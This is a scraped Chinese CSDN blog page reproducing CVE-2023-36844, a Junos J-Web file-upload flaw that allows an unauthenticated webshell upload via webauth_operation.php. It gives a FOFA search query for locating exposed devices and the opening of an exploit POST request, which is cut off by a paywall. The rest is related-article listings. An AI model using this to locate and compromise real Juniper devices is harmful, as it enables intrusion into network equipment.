Junos webauth_operation.php 文件上传漏洞复现（CVE-2023-36844）

最新推荐文章于 2024-09-15 23:59:42 发布

0xSecl

最新推荐文章于 2024-09-15 23:59:42 发布

阅读量1.1k

点赞数 9

分类专栏：漏洞复现文章标签：安全 web安全

本文链接：https://blog.csdn.net/qq_41904294/article/details/134658251

版权

漏洞复现专栏收录该内容

871 篇文章 1428 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了Junos网络操作系统中webauth_operation.php接口的文件上传漏洞，该漏洞允许未认证的攻击者上传php webshell并控制web服务器。复现环境涉及J-Web服务，修复建议是应用厂商发布的安全更新。

摘要由CSDN通过智能技术生成

0x01 产品简介

Junos 是 Juniper Networks 生产的一款可靠的高性能网络操作系统。

0x02 漏洞概述

Junos webauth_operation.php接口处存在文件上传漏洞，未经身份认证的攻击者可利用 Junos 操作系统的 J-Web 服务 /webauth_operation.php 路由上传 php webshell，通过 ?PHPRC 参数进行包含，进入控制整个 web 服务器。

0x03 复现环境

FOFA：app="JUNIPer-Web-Device-Manager"

0x04 漏洞复现

Exp:

POST /webauth_operation.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encod

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

9
点赞
踩
8

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

junos-srxsme-15.1X49-D170.4-domestic.tgz

01-07

标题中的"junos-srxsme-15.1X49-D170.4-domestic.tgz"是一个特定版本的Juniper SRX300设备的软件更新包，这个包采用TGZ（Tar GZip）格式进行压缩。TGZ是一种常见的文件打包和压缩格式，通常用于Linux和Unix系统，它...

Goby 漏洞发布｜Junos webauth_operation.php 文件上传漏洞（CVE-2023-36844）

m0_46699477的博客

09-14

597

Junos 是 Juniper Networks 生产的一款可靠的高性能网络操作系统。攻击者可利用 Junos 操作系统的 J-Web 服务 /webauth_operation.php 路由上传 php webshell，通过?PHPRC 参数进行包含，进入控制整个 web 服务器。

参与评论您还未登录，请先登录后发表或查看评论

速修复！Juniper Junos OS 漏洞使设备易受攻击

smellycat000的专栏

08-21

577

上万台 Juniper 设备易受未认证RCE漏洞攻击

smellycat000的专栏

09-19

335

CVE-2023-33246命令执行复现分析

蚁景网安学院

06-19

769

RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力，同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。

网络安全日报 2023年11月15日

Galaxy_0的博客

11-15

175

云计算和虚拟化技术巨头VMware周二紧急发布了一个紧急补丁，以解决影响其Cloud Director Appliance产品的身份验证绕过漏洞。该漏洞标记为 CVE-2023-34060，CVSS 严重性评分为 9.8（满分 10），可以被具有设备网络访问权限的恶意攻击者利用，在某些端口上进行身份验证时绕过登录限制。

【漏洞复现】CVE-2023-22809 sudo提权漏洞

hack0919的博客

05-20

1328

漏洞等级：高危

junos-srx1k3k-12.3X48-D105.4

08-07

JNCIA-JUNOS-Practice考题.pdf

10-22

JNCIA_JUNOS_Practice考题.pdf

junos-pulse_VB1f7U_1956349735

07-18

junos-pulse_下载软件junos-pulse_下载软件junos-pulse_下载软件junos-pulse_下载软件

小琳AI课堂：确保大语言模型安全的八大策略--从数据隐私到用户教育

最新发布

wx740851326的博客

09-15

118

首先，我们要明白，保证大语言模型的安全，需要从多个方面入手，确保模型在技术、法律、伦理和社会层面都得到妥善处理。大家好，这里是小琳AI课堂。今天我们深入探讨如何保证大语言模型的安全，这可是关系到我们每个人哦！

AI在医学领域：医学AI的安全与隐私全面概述

声纹感知洞察芯声

09-12

1294

本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础，提供一个医疗领域AI攻击研究的全面视角。

SSHamble：一款针对SSH技术安全的研究与分析工具

FreeBuf_的博客

09-11

1074

SSHamble是一款功能强大的SSH技术安全分析与研究工具，该工具基于Go语言开发，可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。

无限边界：现代整合安全如何保护云

网络研究观

09-15

584

通过工具之间更有效的数据共享，整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性（无论是在云端还是在本地），让您能够看到无限周界的边缘。

伙房食堂电气安全新挑战：油烟潮湿环境下，如何筑起电气火灾“防火墙”？

acrel002的博客

09-12

424

安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈，提前将配电转换安全电，从源头抑制电弧火花的产生，大大降低火灾风险，同时系统实时监测电气线路中电压、电流、功率、温度、剩余（漏）电流、对地绝缘阻值等关键数据，智能识别电路异常风险，及时将报警信息传送至云管理系统，提醒用户单位及时进行故障排查。近几年，随着我国经济的飞速发展，食堂餐饮也经历了一场变革，越来越多的电器走进了伙房食堂中，实现了电气化，为人们提供了高效便利的饮食服务，但同时也增加了火灾负荷。

3.比 HTTP 更安全的 HTTPS（工作原理理解、非对称加密理解、证书理解）

weixin_52173250的博客

09-07

1681

HTTPS（Hypertext Transfer Protocol Secure）是一种安全的超文本传输协议，主要用于在客户端和服务器之间安全地传输数据

消防指挥中心控制台：守护安全的关键枢纽

JiaDeLi_console的博客

09-11

416

它不仅是信息的接收者，更是行动的发起者，协调各方资源，确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节，它以先进的设计、强大的功能和不断升级的科技，为守护人民生命财产安全发挥着不可替代的作用。在未来，随着科技的进一步发展，相信消防指挥中心控制台将变得更加智能、高效，为构建更加安全的社会环境贡献更大的力量。同时，控制台还配备了舒适的座椅，为指挥人员提供良好的工作条件。在消防应急救援的战场上，嘉德立消防指挥中心控制台犹如一座坚实的堡垒，发挥着至关重要的作用。二、先进的设计与功能。

构建常态化安全防线：XDR的态势感知与自动化响应机制

安胜ANSCEN的博客

09-11

1027

一款基于XDR理念的一站式安全运营平台，由长年实战对抗中形成的攻防知识经验指导设计，结合大数据、大模型与安全编排自动化响应技术，提供全局监测预警、自动化研判、智能响应、联防联控等能力，体系化提升全局态势感知和主动防御能力，规范化安全运营协同管理工作。星盾作为企业网络安全体系的安全大脑通过汇聚传统安全设备的数据，形成覆盖云、网、边、端全维度的神经元体系，实现跨边界、跨区域、跨设备的全方位安全检测和响应，为全局的安全态势感知、风险评估、资产台账管理、上下联动与协同等安全运营工作提供一站式解决方案。

junos中的CVE-2021-0256的复现过程

05-14

CVE-2021-0256是Junos OS中的一个安全漏洞，如果攻击者能够成功利用该漏洞，他们可以在受影响的设备上执行任意代码或升级其特权。以下是CVE-2021-0256的复现过程： 1. 首先，在Junos OS版本15.1X49-D200及更早版本...